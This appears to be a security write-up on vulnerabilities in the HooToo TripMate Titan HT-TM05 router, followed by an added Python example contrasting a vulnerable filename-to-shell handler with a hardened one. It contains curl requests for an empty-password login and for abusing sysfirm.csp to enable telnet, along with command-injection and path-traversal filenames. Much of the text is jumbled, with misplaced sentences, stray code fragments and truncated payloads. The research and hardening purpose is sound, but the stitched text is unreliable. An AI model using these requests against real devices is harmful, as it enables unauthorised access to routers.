The form data may contain name and filename parameters (which we didn't know yet and which look interesting). And so on.

We confirmed that HooToo TripMate Titan HT-TM05 (firmware HooToo-TM05-Firmare-2.000.080) was vulnerable to multiple critical vulnerabilities.

    except requests.exceptions.ConnectionError:

Partial ASLR is enabled on the router, but the memory layout appears to be quite similar across reboots, hence the hardcoded offsets.

Along with them, we can also find additional memory corruption vulnerabilities: an unauthenticated buffer overflow in mac_table and an unauthenticated buffer overflow in open_forwarding.

binary shares the same vulnerabilities, then it is more than likely that the routers are vulnerable as well.

    :13341:0:99999:7:::

    Set-Cookie: SESSID=p41UE1ZlWl46OrDxongjZirYJ9enqPrQSrAoiwA9JDfw5;
    20100000

Successful login using a blank password:

    curl -i -s -k -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 42' -H $'Connection: close' --data-binary $'fname=security&opt=pwdchk&

Instead, as soon as we understand that we can pass a filename parameter, we could send the following request:

Next, consider what happens if we send a POST request whose filename parameter points to a parent directory.
that he exploited to reach unauthenticated remote code execution.

After some reversing, we identify the cgi class, responsible for handling HTTP POST forms. Snippet of the s_cgi structure initialization:

    .text:004F5A64         lw      $v1, 0x28+cgi($sp)
    .text:004F5A68         lui     $v0, 1
    .text:004F5A6C         addu    $v1, $v0
    .text:004F5A70         la      $v0, loc_4F0000
    .text:004F5A74         nop
    .text:004F5A78         addiu   $v0, (cgi_form - 0x4F0000)
    .text:004F5A7C         nop
    .text:004F5A80         sw      $v0, s_cgi.fct_cgi_form($v1)

Last October (2017), I had a couple of evenings free during an on-site project.
Pseudo-Python code of do_firmware_update:

    if not os.path.exists(useful_path):
        os.system("mkdir -p %s" % useful_path)
    file = HTTP_POST["file"]
    fullpath = "%s/%s" % (useful_path, file)
    os.system("chmod 0700 %s" % fullpath)
    thread.start_new_thread(do_firmware_update)

Exploiting sysfirm.csp to enable telnet:

    $ curl -i -s -k -X $'POST' -H $'AAAA: BBBB' -H $'Content-Type: multipart/form-data; boundary=----------43' --data-binary $'------------43\x0d\x0aContent-Disposition: form-data; name="file"; filename="AAAA"\x0d\x0a\x0d\x0a

The following curl request attempts to log on to the web interface using an empty password, resulting in an error (login failed):

I think we should have a look.

, by many CGI callbacks.

        savesc 3 /usr/sbin/$PRGNAME $SRVNAME
        echo "$SRVNAME service start failure"

I usually hope to find nothing (it is always exciting to be in unknown territories) but this time, Google already had multiple hits:

    GitHub repository containing HooToo TripMate Titan research notes:
    https://github.com/chorankates/h4ck/tree/master/hootoo

    "Protecting the digital nomad" (blog post series, part 1 of 4):
    http://debugtrap.com/2017/03/19/tm06-travel-safe/

    "Hacking travel routers like it's 1999" (DefCon presentation and blog post series, part
    https://ioactive.com/wp-content/uploads/2018/04/DEFCON-25-Mikhail-Sosonkin-Hacking-Travel-Routers-Like-1999-UPDATED.pdf

I recommend giving them a read.
), we can already change the content-type of the POST request accordingly. Debug output when receiving a POST request:

    (httpd.c,thdatatab_alloc,1798)Allocate data 0x5af760
    (httpd.c,httpd_parse_request,776)recevie length: 273
    (httpd.c,httpd_parse_request_line,827)REQLINE:POST
    Content-Type: multipart/form-data; boundary=--------2052049399
    Content-Disposition: form-data; name="test"
    (cgi.c,cgi_tab_alloc,2148)Allocate cgi 0x0x598ab8
    (httpd.c,ht_header_find,1449)Fail: Miss find
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SCRIPT_NAME, v=protocol.csp)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=GATEWAY_INTERFACE, v=CGI/1.1)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PROTOCOL, v=HTTP/1.1)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REQUEST_METHOD, v=POST)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_NAME, v=10.10.10.254)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PORT, v=81)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_ADDR, v=10.10.10.1)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_IDENT, v=OS:[Windows]-Browser:[])
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_TYPE, v=multipart/form-data; boundary=--------2052049399)
    (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_LENGTH, v=95)
    prgcgi_main_handler begin:prgtab[0].name=protocol.csp
    (cgi.c,cgi_init_parse_env,966)cgi->envlen == 0
    (cgi.c,cgi_sess_start,1831)Create a new session: BjxbMS2rYcPZzBSn2srcbR37hX7dMSef3LqQuigsn5qUz
    prgcgi_main_handler end:prgtab[0].name=protocol.csp
    (cgi.c,cgi_tab_free,2187)Free cgi 0x0x598ab8
    (ht_cgi.c,ht_cgi_do,184)Free CGI memory finish
    (httpd.c,httpd_schedule,685)Socket list are empty.
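As an added example (not code from the original post, nor from the HooToo firmware), the following Python reproduces the data flow described above: a multipart/form-data body shaped like the curl request to sysfirm.csp, the Content-Disposition parsing that gives the router its filename parameter, the command string that the reconstructed do_firmware_update pseudo-code would hand to os.system(), and a hardened handler beside it. Everything in it is constructed: USEFUL_PATH stands in for the firmware's real staging directory (not named in the excerpt), the boundary and the "x;id" filename are made up, and the "vulnerable" function only builds the shell command string, it never runs it. That a filename with shell metacharacters becomes command injection is inferred from the pseudo-code's string formatting into os.system(); the parent-directory case is the one the text raises.

```python
"""Added example: how a multipart `filename` reaches the do_firmware_update logic
reconstructed in the post, and what a hardened handler does instead.

All inputs below are constructed for illustration.
"""
import os
import re
import subprocess

BOUNDARY = "----------43"          # constructed, same shape as the curl request
USEFUL_PATH = "/tmp/firmware"      # assumed staging directory, not from the post


def build_multipart(field_name: str, filename: str, payload: bytes = b"") -> bytes:
    """Construct a minimal multipart/form-data body with one file part."""
    return b"".join([
        f"--{BOUNDARY}\r\n".encode(),
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'.encode(),
        b"\r\n",
        payload,
        f"\r\n--{BOUNDARY}--\r\n".encode(),
    ])


_DISP_PARAM = re.compile(r'(\w+)="([^"]*)"')


def parse_filenames(body: bytes) -> dict:
    """Return {name: filename} for each part whose Content-Disposition carries
    a filename parameter, i.e. what the cgi_* code sees after the debug output."""
    result = {}
    for chunk in body.split(f"--{BOUNDARY}".encode()):
        header, _, _ = chunk.partition(b"\r\n\r\n")
        for line in header.split(b"\r\n"):
            if line.lower().startswith(b"content-disposition:"):
                params = dict(_DISP_PARAM.findall(line.decode(errors="replace")))
                if "name" in params and "filename" in params:
                    result[params["name"]] = params["filename"]
    return result


def vulnerable_chmod_command(filename: str) -> str:
    """Mirror the pseudo-code's os.system("chmod 0700 %s" % fullpath).
    Returns the string that would reach /bin/sh; deliberately not executed."""
    fullpath = "%s/%s" % (USEFUL_PATH, filename)
    return "chmod 0700 %s" % fullpath


def hardened_fullpath(filename: str) -> str:
    """Reject directory components, '.'/'..' and shell metacharacters, then
    confirm the resolved path still lives inside USEFUL_PATH."""
    base = os.path.basename(filename)
    if base != filename or base in (".", "..") or not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", base):
        raise ValueError("rejected filename: %r" % filename)
    full = os.path.realpath(os.path.join(USEFUL_PATH, base))
    if os.path.dirname(full) != os.path.realpath(USEFUL_PATH):
        raise ValueError("escapes staging directory: %r" % filename)
    return full


def hardened_chmod_argv(filename: str) -> list:
    """argv for subprocess.run(..., shell=False): no shell, so no injection."""
    return ["chmod", "0700", hardened_fullpath(filename)]


def hardened_chmod(filename: str) -> None:
    """Actually perform the chmod without a shell (not called in the demo)."""
    subprocess.run(hardened_chmod_argv(filename), check=True)


def is_rejected(filename: str) -> bool:
    """True if the hardened handler refuses this filename."""
    try:
        hardened_fullpath(filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name in ("AAAA", "../../etc/passwd", "x;id"):
        got = parse_filenames(build_multipart("file", name))["file"]
        print("filename  :", got)
        print("vulnerable:", vulnerable_chmod_command(got))
        print("hardened  :", "rejected" if is_rejected(got) else hardened_chmod_argv(got))
```

The vulnerable builder shows why the post's filename parameter is the interesting one: it is copied verbatim into a shell command, so both a parent-directory prefix and any shell metacharacter survive into the string. The hardened path keeps only a basename, whitelists its characters, and passes an argv list to subprocess with shell=False, so the three classes of payload are stopped before anything executes.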